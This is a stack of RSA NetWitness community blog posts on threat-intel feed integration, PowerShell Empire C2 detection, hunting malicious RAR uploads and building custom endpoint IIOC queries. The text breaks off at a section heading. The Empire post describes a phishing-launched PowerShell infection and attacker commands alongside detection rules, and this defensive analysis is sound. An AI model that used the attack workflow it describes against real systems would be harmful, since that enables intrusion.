Skip navigation
All Places > Products > RSA NetWitness Platform > Blog

RSA NetWitness has a number of integrations with threat intel data providers but two that I have come across recently were not listed (MISP and Minemeld) so I figured that it would be a good challenge to see if they could be made to provide data in a way that NetWitness understood.


Current RSA Ready Integrations



Install the MISP server in a few different ways


VMWare image, Docker image or on an OS are all available (VMware image worked the best for me)


Authenticate and setup the initial data feeds into the platform

Set the schedule to get them polling for new data


Once created and feeds are being pulled in you can look at the attributes to make sure you have the data you expect


Test the API calls using PyMISP via Jupyter Notebook

  • you can edit the notebook code to change the interval of data to pull back (last 30 days, all data or such to limit impact on the MISP server)
  • You can change the indicator type (ip-dst, domain etc.) to pull back the relevant columns of data
  • You can change the column data to make sure you have what you need as other feed data


Once that checks out and you have the output data you want via the notebook you can add the python script to the head server of NetWitness


Install PyMISP on the head server of the NetWitness system so that you can crontab the query.

  • Install PyMISP using PIP

(keep in mind that updating the code on the head server could break things so be careful and test early and often before committing this change in production)

yum install
yum install python-pip
OWB_FORCE_FIPS_MODE_OFF=1 pip install pymisp
OWB_FORCE_FIPS_MODE_OFF=1 pip install --upgrade pip
yum repolist
vi /etc/yum.repos.d/epel.repo
change enabled from 1 to 0

Make sure you disable the epel repo after installing so that you don't create package update issues later


Now setup the query that is needed in a script (export the Jupyter notebook as python script)


Crontab the query to schedule it (the OWB is required to work around FIPS restrictions that seem to break a number of script related items in python)

23 3 * * * OWB_FORCE_FIPS_MODE_OFF=1 /root/rsa-misp/ > /var/lib/netwitness/common/repo/misp-ip-dst.csv


Now setup the NetWitness recurring feed to pull from the local feed location

map the ip-dst values (for this script) to the 3rd column and the other columns as required





Minemeld is another free intel aggregation tool from Palo Alto Networks and can be installed many ways (i tried a number of installs on different Ubuntu OSes and had difficulties), the one that worked the best for me was via a docker image.


Docker image that worked well for my testing


docker run -it --tmpfs /run -v /somewhere/minemeld/local:/opt/minemeld/local -p 9443:443 jtschichold/minemeld

to make it run as daemon after testing add the -d command to have it continue running after you exit the terminal


After installing (if you do this right you can get a certificate included in the initial build of the container that will help with the Certificate trust to NW) you will log in and set up a new output action to take your feeds and map them to a format and output that can be used with RSA NetWitness.


This is the pipeline that we will create which will map a sample threat intel list to an output action so that NetWitness can consume that information

And it gets defined by editing the yml configuration file (specifically this section creates the outboundhcvalues section that NetWitness reads)

- aggregatorIPv4Outbound-1543370742868
output: false
prototype: stdlib.feedHCGreenWithValue

This is a good start for how to create custom miners


Once created and working you will have a second miner listed and the dashboard will update


You can test the feed output using a direct API call like this via the browser


the  query parameters are explained here:


in this case:


translate IP ranges into CIDRs. This can be used also with v=json and v=csv.


returns the indicator list in CSV format.


The list of the attributes is specified by using the parameter f one or more times. The default name of the column is the name of the attribute, to specify a column name add |column_name in the f parameter value.


The h parameter can be used to control the generation of the CSV header. When unset (h=0) the header is not generated. Default: set.


Encoding is utf-8. By default no UTF-8 BOM is generated. If ubom=1 is added to the parameter list, a UTF-8 BOM is generated for compatibility.


F are the column names from the feed

This command testing drops a file in your browser to look at and make sure you have the data and columns that you want


Now once you are confident in the process and the output format you can script and crontab the output to drop into the local feed location on the head server (I did this as i couldn't figure out how to accept the self signed certificate from the docker image).

# 22 3 * * * /root/rsa-minemeld/

Now create the same local recurring feed file to pull in the information as feed data on your decoders.

Define the column to match column 1 for the IP in CIDR notation and map the other columns as required




Now we have a pipeline for two additional threat data aggregators that you may have a need for in your environment.

There are a myriad of post exploitation frameworks that can be deployed and utilized by anyone. These frameworks are great to stand up as a defender to get an insight into what C&C (command and control) traffic can look like, and how to differentiate it from normal user behavior. The following blog post demonstrates an endpoint becoming infected, and the subsequent analysis in RSA NetWitness of the traffic from PowerShell Empire. 


The Attack

The attacker sets up a malicious page which contains their payload. The attacker can then use a phishing email to lure the victim into visiting the page. Upon the user opening the page, a PowerShell command is executed that infects the endpoint and is invisible to the end user:



The endpoint then starts communicating back to the attacker's C2. From here, the attacker can execute commands such as tasklistwhoami, and other tools:


From here onward, the command and control would continue to beacon at a designated interval to check back for commands. This is typically what the analyst will need to look for to determine which of their endpoints are infected.


The Detection Using RSA NetWitness Network/Packet Data

The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.


The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. The analyst can then look into pulling apart the characteristics of the protocol by using the Service Analysis meta key. From here they notice a couple interesting meta values to pivot on, http with binary and http post no get no referer directtoip:


Upon reducing the number of sessions to a more manageable number, the analyst can then look into other meta keys to see if there are any interesting artifacts. The analyst look under the Filename, Directory, Client Application, and Server Application meta keys, and observes the communication is always towards a microsft-iis/7.5 server, from the same user agent, and toward a subset of PHP files:


The analyst decides to use this is as a pivot point, and removes some of the other more refined queries, to focus on all communication toward those PHP files, from that user agent, and toward that IIS server version. The analyst now observes additional communication: 


Opening up the visualization, the analyst can view the cadence of the communication and observes there to be a beacon type pattern:


Pivoting into the Event Analysis view, the analyst can look into a few more details to see if there suspicions on this being malicious are true. The analyst observes a low variance in payload, and a connection which is taking place ~every 4 minutes:


The analyst reconstructs some of the sessions to see the type of data being transferred, the analyst observes a variety of suspicious GET and POST's with varying data being transferred:


The analyst confirms this traffic is highly suspicious based of the analysis they have performed, the analyst subsequently decides to track the activity with an application rule. To do this, the analyst looks through the metadata associated with this traffic, and finds a unique combination of metadata that identifies this type of traffic:


(service = 80) && (analysis.service = 'http1.0 unsupported cache header') && (analysis.service = 'http post missing content-type')


IMPORTANT NOTE: Application rules are very useful for tracking activity. They are however, very environment specific, therefore an application rule used in one environment, may be of high fidelity, but when used in another, could be incredibly noisy. Care should be taken when creating or using application rules to make sure they work well within your environment.


The Detection Using RSA NetWitness Endpoint Tracking Data

The analyst, as they should on a daily basis, is perusing the IOC, BOC, and EOC meta keys for suspicious activity. Upon doing so, they observe the metadata, browser runs powershell and begin to investigate:


Pivoting into the Event Analysis view, the analyst can see that Internet Explorer spawned PowerShell, and subsequently the PowerShell that was executed:


The analyst decides to decode the base64 to get a better idea as to what the PowerShell is executing. The analyst observes the PowerShell is setting up a web request, and can see the parameters it would be supplying for said request. From here, the analyst could leverage this information and start looking for indicators of this in their packet data (this demonstrates the power behind having both Endpoint, and Packet solutions):


Pivoting in on the PowerShell that was launched, it is also possible to see the whoami and tasklist that was executed as well. This would help the analyst to paint a picture as to what the attacker was doing: 



The traffic outlined in this blog post is of a default configuration for PowerShell Empire; it is therefore possible for the indicators to be different depending upon who sets up the instance of PowerShell Empire. With that being said, C2's still need to check-in, C2's will still need to deploy their payload, and C2's will still perform suspicious tasks on the endpoint. The analyst only needs to pick up on one of these activities to start pulling on a thread and unwinding the attackers activity,


It is also important to note that PowerShell Empire network traffic is cumbersome to decrypt. It is therefore important to have an endpoint solution, such as NetWitness Endpoint, that tracks the activities performed on the endpoint for you.


Further Work

Rui Ataide has been working on a script to scrape data looking for instances of PowerShell Empire. The attached Python script queries the API looking for specific body request hashes, then subsequently gathers information surrounding the C2, including:


  • Hosting Server Information
  • The PS1 Script
  • C2 Information


Also attached is a sample output from this script with the PowerShell Empire metadata that has currently been collected.

Often times, Administrators and Content Managers alike need more information regarding their current parser status (both Logs and Network [formerly Packets]). There is an older, fancier interface for Log parser meta keys located here:

The script in this blog post is a bit more real-time and allows you to gain some additional visibility into your meta keys.




Please ensure you have run the on your SA Server (10.x) or NW Server / Node0 (v11). The script requires access to downstream services using SCP for the log parsing functionality.




Log Parser -> Meta Key Mapping:
When run in Log mode with a specific parser as a parameter, this will output all of the meta keys used in that parser. It will also output the format and whether that key is "Passed to the Concentrator", that is, if the key has flag set to is Transient (not passed to Concentrator in the session) or None (passed to the Concentrator).


Network Parser -> Meta Key Mapping:
When run in Network mode with IP of the Network Decoder, will output all of the Enabled parsers with its respective keys.

White = Enabled
Yellow = Transient
Red = Disabled




To run in Log mode:
Example: ./ -l <PARSER NAME> -i <LOG DECODER IP>
Example: ./ -l rhlinux -i


To run in Network mode:
Example: ./ -n -i <NETWORK DECODER IP>
Example: ./ -n -i

Sample Output


Log Parser -> Meta Key Mapping


Network Parser -> Meta Key Mapping


Hi Everyone,

On behalf RSA NetWitness, we are excited to bring you our first issue of the RSA NetWitness Platform newsletter. 


Our goal is to share more information about whats happening and key things for you to be aware of regarding our products and services. 


This will be a monthly newsletter, so you can expect the next newsletter in early May.  


No, this is not an April fools joke!!


There's a very short survey at the end of the second page in the newsletter.  Please share your thoughts with us so we can continue to improve it over time and make sure it contains useful information for you going forward.  


Thanks everyone!


***  EDIT  *** 

For anyone who does not feel comfortable downloading and viewing the .pdf copy of this newsletter, I've added screenshots of the newsletter so that you can still view the content.  Just note that by doing this, obviously none of the hyperlinks will work for you unless you download the .pdf.




Introduction to MITRE’s ATT&CK™

Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) for enterprise is a framework which describes the adversarial actions or tactics from Initial Access (Exploit) to Command & Control (Maintain). ATT&CK™ Enterprise deals with the classification of post-compromise adversarial tactics and techniques against Windows™, Linux™ and MacOS™.

This community-enriched model adds techniques used to realize each tactic. These techniques are not exhaustive, and the community adds them as they are observed and verified.

To read more about how ATT&CK™ is helpful in resolving challenges and validate our defenses, please check this article.


Introduction to MITRE’s ATT&CK™ Navigator

ATT&CK™ Navigator is a tool openly available through GitHub which uses the STIX 2.0 content to provide a layered visualization of ATT&CK™ model.

ATT&CK™ Navigator stores information in JSON files and each JSON file is a layer containing multiple techniques which can be opened on Navigator web interface. The JSON contains content in STIX 2.0 format which can be fetched from a TAXII 2.0 server of your own choice. For example, we can fetch ATT&CK™ content from MITRE's TAXII 2.0 server through APIs.

The techniques in this visualization can be:

  • Highlighted with color coding.
  • Added with a numerical score to signal severity/frequency of the technique.
  • Added with a comment to describe that occurrence of technique or any other meaningful information.

These layers can be exported in SVG and excel format.


How to View a JSON in ATT&CK™ Navigator?

  1. Open MITRE’s ATT&CK™ Navigator web application. (
  2. In Navigator, open a New Tab through clicking '+' button.

  3. Then click on 'Open Existing Layer' and then 'Upload from Local' which will let you choose a JSON file from your local machine (or, the one attached later in this blog).


  4. After uploading JSON file the layer will be opened in Navigator and will look like this:



This visualization highlights the techniques covered in the JSON file with color and comments.


RSA Netwitness Endpoint Application Rules

The Rule Library contains all the Endpoint Application Rules and we can map these rules or detection capabilities to the tactics/techniques of ATT&CK™ matrix. The mapping shows how many tactics/techniques are detected by RSA NetWitness Endpoint Application Rules.

We have created a layer as a JSON file which has all the NetWitness Endpoint Application Rules mapped to techniques. Then we have imported that layer on ATT&CK™ Navigator matrix to show the overlap. In the following image, we can see all the techniques highlighted that are detected by NetWitness Endpoint Application Rules:




The JSON for Endpoint Application Rules is attached with this blog and can be downloaded.


While hovering mouse over each colored technique you can see three things:

  1. Technique ID: Unique IDs of each technique as per ATT&CK™ framework.
  2. Score:  Threat score given to each technique.
  3. Comment: We can write anything related in comment to put things in perspective. In this case, we have commented pipe (‘|’) delimited names of application rules which cover that technique.


To quantify how much RSA NetWitness Endpoint Application Rules spread across the matrix we can refer to the following plot:




We have already mapped RSA ESA Rules with ATT&CK™ framework as described in this article. We can update these ATT&CK™ coverage periodically which will help us to give us a consolidated picture of our complete defense system and thus we can quantify and monitor the evolution of our detection capabilities.








This is not an April Fools’ Day joke – RSA Charge registration fees go up from $595 to $995 on April 2. Trust us, you will not want to miss this year’s Charge event. REGISTER TODAY!


RSA Charge 2019 will provide you a place to discover game-changing business-driven security solutions to meet today’s greatest business challenges. Attendees will explore best practices and have opportunities to problem-solve and discuss ideas for product and service innovation to increase productivity. From customer case studies to training as well as one-on-one consultations and motivating keynotes, this year’s conference has something for everyone!


RSA Charge 2019 will deliver a host of new content and exciting opportunities through:

Customer-led case studies and hands-on workshops to share trends and issues specific to your industry

Thought-provoking keynote presentations that provides insights on RSA’s products, solutions and customer successes

Partner Expo highlights solutions that are driving high-impact business benefits using RSA’s solutions

Unparalleled Networking invites you to exchange ideas with your peers and RSA experts and save – early bird rates are $595 and available through April 1, 2019, then the regular registration price kicks in at $995. The RSA Charge 2019 website should be your go-to destination for all ‘Charge’ information - Call for Speakers, Agendas at a Glance, Full Agendas and speakers, Keynotes, and so much more.


RSA Charge 2019 will be in Orlando from September 16-19, 2019 @ Walt Disney World Dolphin & Swan Hotel, Orlando. 


REGISTER before April 2, save $400 and check out the RSA Charge 2019 website for continual updates like the one below:


Just Added: Looking for pre-conference training? Due to RSA Charge starting on a Monday and being on the Disney grounds, RSA has decided not to offer any pre-conference training this year but instead offer a whole RSA University track dedicated to your favorite training topics at no extra cost. That’s right, no additional cost!


There will also be RSAU representatives, onsite to talk shop and answer any and all of your questions, just another reason to attend RSA Charge 2019. We look forward to seeing you all in Orlando.

Cisco Umbrella uses the internet’s infrastructure to block malicious destinations before a connection is ever established.  By delivering security from the cloud, not only do you save money, but also provide more effective security.  Cisco Umbrella observes your internet traffic, blocks any malicious destinations and logs the activities. Our Cisco Umbrella plugin is meant to collect these logs into the NetWitness Platform which helps the security analysts to analyze the different kinds of attacks, security breaches etc.


For more information please refer to:


Logs from Cisco Umbrella cloud can be exported to an AWS S3 bucket which can be managed by Cisco or the customer.  Cisco Umbrella plugin uses Amazon's API to fetch the logs from AWS s3 bucket.





Configuration Guide:  Cisco Umbrella Event Source Configuration Guide 

Collector Package on RSA Live: "Cisco Umbrella Log Collector Configuration"

Parser on RSA Live: CEF

On a recent engagement, I took a different approach to finding possible malicious files entering the customer's network.  Rather than focusing on the e-mail, I looked for any RAR, macro-enabled office documents, and portable executable files (PE) entering the network where no service was specified.  Of course, this was done using RSA NetWitness and immediately I found a RAR file which contained a malicious executable.  Although, this was a different vector by which it entered the network.  It didn't appear to be a link that someone clicked from an e-mail and it wasn't an attachment from an email either.  It was from a customer configured, cloud based support site.  You can find many customers who use these types of sites.


So here's how I believe this was attempted.  A malicious actor goes to the <customer name>.<customer support site>.com site where they open a support ticket for an order they placed. (Of course they probably didn't place an actual order)  Then using the support interface, they upload what appears to be an order list.  In this instance I found the file name was "OrderList_Xlsx.arj" which is a RAR file and inside was a file called "OrderList.exe" all of which was downloaded by the customer support representative using their admin console to the site.


It's a simple approach.  It involves the actor opening a support ticket on the customer's site but whether they are actually doing this or using a script/automation is another question.  In this instance, I didn't see it as being targeted towards this customer but maybe they're testing the waters.  Without having access to this customers admin console to this service it's hard to determine whether this is happening more frequently because from our perspective, we only see where the employee downloads the file and enters into the customer's network. 


I created a quick and easy search to find this type of activity. = '<customer name>.<customer support site>.com' && (filetype = 'rar' || filetype = 'windows executable' || ((filetype = 'zip' || filetype contains 'office') && filename contains 'vbaproject.bin') || extension contains 'docm','xlsm','pptm' || content contains 'macro')

This post details some of the implications of running in a mixed-mode environment. For the purposes of this post, a mixed-mode environment is one in which some services are running on RSA Security Analytics 10.6.x, and others are running on RSA NetWitness 11.x.


Note: RSA strongly suggests upgrading your 10.x services to 11.x to match your NetWitness server version, but running in Mixed-Mode allows you to stage your upgrade, especially for larger environments.


If you run in a mixed-mode environment for an extended time, you may see or experience some or all of the following behaviors:

Overall Administration and Management Functionality

  • If you add any 10.6.x hosts, you must add them manually to the v11.x architecture.
    • There is no automatic discover, or trust establishment via certificates.
    • You need to manually add them through username and password.
  • In 11.x, a secondary or alternate NetWitness (NW) Server is not currently supported, though this may change for future NetWitness versions.
    • Only the Primary NW Server could be upgraded (which would become "Node0").
    • Secondary NW Servers could be re-purposed to other host types.
  • The Event Analysis View is not available at all in mixed mode, and will not work until ALL devices are upgraded to 11.x.

Mixed Brokers

If you do not upgrade all of your Brokers, the existing Navigate and Event Grid view will still be available.

Implications for ESA

If you follow the recommended upgrade procedure for ESA services, note the following:

  • During the ESA upgrade, the following mongo collections are moved from the ESA mongodb to the NW Server mongodb:
    • im/aggregation_rule.*
    • im/categories
    • im/ tracking_id_sequence
    • context-wds/* // all collections
    • datascience/* // all collections
  • The upgrade process performs some reformatting of the data: so make sure to follow those procedures as described in the Physical Host Upgrade Guide and Physical Host Upgrade Checklist documents, available on RSA Link. One way to find these documents is to open the Master Table of Contents, where links are listed in the Installation and Upgrade section.


IMPORTANT!You MUST upgrade your ESA services at the same time you upgrade the NetWitness Server. If you do not, you will have to re-image all of the ESA services as new, and thus lose all of your data. Also, if you do not plan on updating your ESA services, you would need to REMOVE them from the 10.6.x Security Analytics Server before you start your upgrade

Hosts/Services that Remain on 10.6.x

  • If you add a 10.6.x host after you upgrade to 11.x, no configuration management is available through the NetWitness UI. You must use the REST API for this. Existing 10.6.x devices will be connected and manageable via 11.x -- as long as you do not remove any aggregation links.
  • You need to aggregate from 10.6.x hosts to 11.x hosts manually.
    • For example, for a Decoder on 10.6.x and a Concentrator on 11.x:
    • Same applies for any other 11.x service that is aggregating from a 10.6.x host.
  • If you have a secondary Security Analytics Server, RSA recommends that you keep it online to manage any hosts or services that still are running 10.6.x, until you have upgraded them all to 11.x. 


If you are doing an upgrade on a system that has hybrids, the communication with the hybrids will still be functional. The Puppet CA cert is used to as the cert for the upgraded 11.x system, so the trust is still in place.

For example, if you have a system with a Security Analytics or NetWitness Server, an ESA service, and several hybrids, you can upgrade the NW Server and the ESA service, and communications with the hybrids will still work.

Recommended Path Away from Mixed-Mode

For large installations, you can upgrade services in phases. RSA recommends working "downstream." For example:

  1. For the initial phase (phase 1), upgrade the NW Server, ESA and Malware services. Also, upgrade at least the top-level Broker. If you have multiple Brokers, the suggestion is to upgrade all of them in phase 1.
  2. For phase 2, upgrade your concentrators, decoders, and so forth. The suggestion is to upgrade the concentrators and decoders in pairs, so they can continue communicating correctly with each other.

Instant Indicators of Compromise (IIOC)s are a feature within the NetWitness Endpoint (NWE) platform that looks for defined behavioral traits such as processes execution, memory anomalies, and network activity. By default, NWE is packaged with hundreds of built-in IIOCs that are helpful for identifying malware and hunting for malicious activity. The topic of this article is relevant because new attacker techniques are constantly being discovered which can potentially be accounted for through the development of new IIOCs. In addition, individual organizations can devise active defense measures specific to their environment for the purpose of identifying potentially anomalous behavior through IIOC customization. Before diving into the details of developing IIOCs let’s review NWE documentation on the subject.


Warning: The database, in which IIOCs are dependent on, is subject to incur changes with each version of NWE which may affect custom created IIOCs. Contents within this article are based off the current version of NWE:


The user guide provides a plethora of useful information on the subject of IIOCs and this article assumes that the reader has a baseline knowledge of attributes such as IIOC level, type, and persistent IIOCs.  However, specifically regarding the creation and editing of IIOCs, there is limited information that is documented. Figure 1 is an excerpt from the NWE manual providing steps for IIOC creation.


NWE User Guide IIOC Creation

Figure 1: Excerpt from NWE User Guide


Reviewing and modifying existing IIOC queries will often times allow users to achieve the desired behavior. It is also a great way to enhance the user’s understanding of important database tables, which will be covered more in the query section. However, there is much more that can be said on the topic of IIOC creation. Expounding on these recommendations, as well as the entire “Edit and Create IIOC” section in the user guide, building a new IIOC can be broken down into three major steps.


IIOC Creation Steps:

  • Create a new IIOC entry
  • Develop the SQL Query
  • Validate IIOC for Errors


Create IIOC Entry

Before we delve into the specifics of IIOC queries, let's begin with the basics. A new IIOC can be created in the IIOC window either by clicking the "New" button in the InstantIOC sub-window or by right-clicking on a specific entry in the IIOC table and then choosing the clone option. Both of these options are circled in red in Figure 2. As the name suggests, cloning an IIOC entry will copy over most of the attributes of the designated item such as the level, type, and query. In both cases, the user must click save in the InstantIOC sub-window for any changes to remain.


IIOC Entry Creation Options

Figure 2: IIOC Entry Creation Options


When creating a new IIOC make sure that the Active checkbox is not marked until the entry has been finalized. This will prevent the placeholder from executing on the server until the corresponding query has been tested and verified. The IIOC level assigned to a new entry should reflect both its severity as well as the query fidelity. For example, a query that is prone to a high number of false positives would be better suited as a higher level in order to avoid inflated IIOC scores.


There are four unique IIOC types that can be chosen from in the Type drop-down menu: Machine, Module, Event, and Network. The distinction between these types will be further elaborated on in the next section. Also, be aware that IIOCs are platform specific, so the user must ensure that the correct operating system is chosen for the specified IIOC. Changing the OS platform can be done by modifying the ‘OS Type’ field and will cause the IIOC to appear in its matching platform table.


IIOC Platform Tables

Figure 3: IIOC Platform Tables


At this point, it is also notable that all user-defined IIOCs will automatically be given a non-persistent attribute. This means that any modules or machines associated with the matching conditions of the IIOC will only remain associated as long as the corresponding values that matched are in the database. Non-persistent behavior is potentially problematic for event tracking and scan data, which utilizes ephemeral datasets. In order to bypass this potential pitfall, the persistent field can be updated for the targeted IIOC as seen in the SQL query below.


Update IIOC Persistent Field

Figure 4: Update IIOC Persistent Field

Develop Query

Once a placeholder entry for an IIOC has been created, it can then be altered to achieve the desired behavior by modifying the query. IIOCs are built primarily through the use of SQL select statements. If the reader does not have a fundamental knowledge of the SQL language then a review of SQL tutorials such as W3Schools[1] is recommended.


More complex IIOCs can make use of additional SQL features such as temporary tables, unions, nested queries, aggregator functions, etc. However, a basic IIOC select query can be broken down to three major components: fields, tables, and conditions.


Basic IIOC Query Sections

Figure 5: Query Sections


Database Tool

In order to develop and test queries for IIOCs, it is highly advantageous for the user to have access to database administrative software. An example of such a tool is SQL Management Studio, which can be installed alongside the Microsoft SQL Server instance on the NWE server. There are many alternative options to choose from such as heidiSQL and DBeaver, if the user wishes to connect from a client system or a non-Windows machine.  These tools can also be used to provide further visibility into the database structure and to perform direct database queries for analysis purposes.


Required Fields

As shown in Figure 5, IIOCs require specific fields or columns, to be selected in order to properly reference the required data in the interface. Depending on the IIOC type chosen, these fields will slightly vary, but there will always be one or more primary keys needed from tables such as machines and machinemodulepaths.  Unlike the other types, machine IIOCs only require the primary key of the ‘machines’ table. Nevertheless, the NWE server still expects two returned values. In these instances, a null value can be used as the second selected field.


Furthermore, the operating system platform will affect the keys that are selected in the IIOCs. Linux does not currently support event or network tracking, and the associated tables do not exist in the NWE database. Selected keys are expected to be in the order shown in Table 1 per entry from top to bottom.




































 Table 1: Required Fields by Platform


Keys selected can be either the primary keys shown in the table above or their associated foreign keys. Premade IIOC queries typically alias any selection of primary keys (PK_*) to match the prefix used for foreign keys (FK_*). However, this selection was probably chosen for consistency and does not affect the results of the query.


Tables Needed

Moving on to the next section of the IIOC query, we will need to determine which tables are selected or joined. As shown in the previous section, there are required keys based on the IIOC type. Therefore, the selected tables for a valid IIOC query must reference these keys. The tables that are needed will also be dependent on the fields that are utilized for the IIOC conditions, which will be covered in the next section. While there are hundreds of tables in the NWE database, knowledge of a few of them will help to facilitate basic IIOC development.


Since the NWE database currently utilizes a relational database, many important attributes of various objects such as filenames, launch arguments, paths, etc. are stored within different tables. A SQL join is required when queries utilize fields from multiple tables. In most cases when joining a foreign key to a primary key, an “inner join” can be used. However, if the IIOC writer must join tables on a different data point, then an alternative join type should be considered. A similar approach should be taken for any foreign keys that do not have the “Not Null” property.


Tables Used in IIOC

Figure 6: Tables Used in IIOC Query


As with the selected keys in the Required Fields section, in many cases, there are separate tables based on the platform being queried. In these instances, the table name will be similar to its Windows counterpart with a special prefix denoting the platform. For example, the MachineModulePaths table that contains module information on a machine specific basis is called MacMachineModulePaths for OSX and LinuxMachineModulePaths for Linux. Table 2 contains the table names in the NWE database that are most useful while creating IIOCs. Most of these tables are platform specific, however, a few correspond to all operating systems. The next section will provide additional context for some of the Windows tables and their associated fields.














































 Table 2: Useful Tables for IIOC Creation


Table Relations and IIOC Conditions

The final portion of the IIOC query pertains to the conditions that must be met in order to return valid results. In other words, it is the part of the query that defines what the IIOC is attempting to detect. For a standard SQL select IIOC this logic is contained within the where clause of the statement at the end of the query. In this segment, we will be going further in depth into the relevant database tables and covering the most pertinent fields for IIOC conditions.


To assist with elaborating on database details, this section contains simple diagrams to illustrate the relationship between the various tables and their fields. These schema diagrams, which are very condensed, are not meant to include every relevant field that the tables describe. Additionally, for the sake of brevity, these cover the Windows versions. However, a similar pattern applies to the non-Windows operating systems when applicable.

Most IIOC queries will make use of the MachineModulePaths table to some degree, as it acts as an intersection between many of the other tables used by the NWE database. For this reason, it makes for a great starting point for our database examination.


Module Tables

Figure 7: Module Tables


MachineModulePaths contains keys to tables such as the Paths, FileNames, and UserNames referenced by FK_FileNames, FK_Paths, and FK_UserNames__FileOwner. These keys point to tables that primarily contain what their table name describes (e.g. filenames, usernames, paths).  Fields in these ancillary tables are generally valuable for filtering, regardless of IIOC type and are frequently referenced by other database tables including the ones for alternate OS platforms. The query in Figure 8 is an example of a SQL select statement that utilizes these fields by joining their associated tables with machinemodulepaths.


Basic IIOC Filters

Figure 8: Basic Filters


At its core, MachineModulePaths contains aspects of modules that apply on a per machine basis. This includes the various tracked behaviors, associated autoruns, and network activity. Network related fields correspond to general network behavior, and not comprehensive network tracking which is stored in a different table. Table 3 provides a trimmed list of fields from the MachineModulePaths that can be potentially useful for IIOC filtering.


Field Name

Date Type

Field Name

Data Type





















































 Table 3: MachineModulePaths Fields


MachineModulePaths also has a reference to the Modules table which contains more information about the executable. Unlike MachineModulePaths, the Modules table stores data about an executable that is immutable from machine to machine. This data includes the cryptographic hashes, executable header values, entropy, etc. Similar to the table provided for MachineModulePaths, Table 4 lists useful fields found within the Modules table.


Field Name

Date Type

Field Name

Data Type













































 Table 4: Modules Fields


Lastly, the Machines table is comprised of machine attributes that a specific module was observed executing on. This includes data such as the machine name, associated IP address, and OS version. All endpoints in NWE are listed in this table regardless of OS platform.


Next, is the event tracking table, which for Windows endpoints are represented in the WinTrackingEvents* tables. While the diagram in Figure 9 only shows the WinTrackingEventsCache table, the Windows event tracking actually utilizes two additional tables for permanent event storage (WinTrackingEvents_P0 and WinTrackingEvents_P1). Since WinTrackingEventCache contains only the most recent events it is the most efficient of these tables for IIOCs. However, with the populated data constantly migrating to another table, any IIOC that utilizes it will need to be set to persistent in order to be effective.


WinTrackingEventCache Table

Figure 9: WinTrackingEventCache Table


Tracking event tables contain a reference to a secondary table called LaunchArguments, which is also used by several other tables. An IIOC will only need to join this table with WinTrackingEvents* for the source command-line arguments, as many of the target process attributes are already stored as varchar fields in the table. Booleans for various event behaviors are also extremely useful for a filtering event in these tables.


Field Name

Date Type

Field Name

Data Type

















































 Table 5: WinEventTracking Fields


The table used to store network tracking data for Windows systems is called MocNetAddresses. This table tracks unique instances of network connections and their associated execution environment such as the machine, module, and launch arguments. Unlike event tracking data, this table keeps account of the module which initiated the network request (FK_MachineModulePaths) as well as the process it resides within (*__Process). The distinction is useful in cases where a loaded library is responsible for a network request, such as a service DLL in svchost.exe.  There is also a secondary table tracking the domain name of the associated request called Domains.


MocNetAddress Table

Figure 10: MocNetAddresses Related Tables


In addition to the domain, the IP and Port fields are also useful filters for the MocNetAddresses table. Network sessions with an RFC 1918 destination address can be disregarded using the NonRoutable field. A trimmed list of MocNetAddresses fields that can be used for IIOC conditions is provided in Table 6.


Field Name

Date Type

Field Name

Data Type









































Table 6: MocNetAddress Fields


Finally, we will briefly cover scan data found inside the NWE database. These tables include additional information concerning autostarts, services or crons, memory anomalies, etc. Similarly, to the module and tracking data tables, the presence of scan-related tables are OS platform specific. For example, memory anomaly tables are currently only used by Windows systems and tables such as bash history only apply to Linux endpoints.
































Table 7: Scan Data Tables by Platform


Scan data tables can also be considered ephemeral datasets that are replaced upon a new scan. Thus, persistent IIOCs should be used when referencing these tables to avoid missing IIOC matches, especially in environments where the scanning schedule is set to a high frequency of occurrence.


Identifying New Columns and Tables

When attempting to determine the table and column associated with known fields in the NWE interface, it can be helpful to query the information_schema database. For instance, consider a circumstance where a user needs to create an IIOC based on a unique section name string in an executable, but does not know the corresponding column name within the database. In the UI, this field is located in the properties window of a specific module and its field name is called “Sections Names”.  By querying the columns table and reviewing the results, it can be determined that a similar fieldname is located in the modules tables.


InformationSchema Query

Figure 11: Information_Schema Query


In most cases, the field name in the UI will be almost identical to its corresponding column name within the database. Further filtering or sorting by the data type and expected table name can also be useful to identify the desired column when a large number of results are returned.


Check for Errors

IIOC validation should initially be performed as part of crafting the query. Check for any errors and that the expected number of fields and values are returned when executing the query being tested. Once a new IIOC entry has been created, and the query edited, refresh the window and check for an updated “Last executed” field. Also, make sure that the Active check box in the InstantIOC sub-window is marked. Note that it may take a few minutes for the IIOCs to be executed by the server from the time that the new entry was set to active.  To quickly identify any custom IIOCs that have been created, use the column filter on the “User Defined” field in the IIOC table.


User Defined IIOC Filter

Figure 12: IIOC Table Filter on “User Defined” Field


If any resulting errors occurred after the IIOCs have been executed by the database, then the entire row for the failed IIOC will be italicized. There will also be an error message located in the “Error Message” field to provide additional context as to why it occurred. In the example in Figure 13, the highlighted IIOC entry called “Test IIOC” returned an error for an invalid column name. In this case, the first selected field had a minor typo, and should have been referenced as “fk_machines”.


IIOC Error

Figure 13: IIOC Table with Error Returned


Tip: SQL Query

Analyzing data directly from the back-end database is definitely outside of the scope of this article, however, a useful tip for IIOC development is to include a “human readable” query alongside any custom developed IIOCs. Doing so will allow the analyst to review all the relevant data that is related to the query instead of just seeing the machines and modules associated with the IIOC in the interface. In the example shown in Figure 14, there is an additional query that is commented out. Instead of selecting the keys listed in the Required Fields section, this query selects fields that provide additional context to the analyst typically based on the fields in the IIOC condition.


Human Readable Query

Figure 14: IIOC with Human Readable Query


Since the second query has been commented out, it does not affect the IIOC in any way. However, it does provide the analyst with the means to quickly gain additional information regarding the related events. Executing the query, as shown in Figure 15, provides previously unseen information such as source and target arguments and the event time. This information would normally only be available on a per machine basis in the interface. Reviewing data in this manner is especially useful when analyzing queries that return a high number of results and potential false positives.


Query Results

Figure 15: Database Query Results


Custom IIOC Examples

The following section covers examples of IIOCs that are currently, as of version, not included by default. Each example is based on potentially anomalous behavior or observed threat actor techniques.


Filename Discrepancies

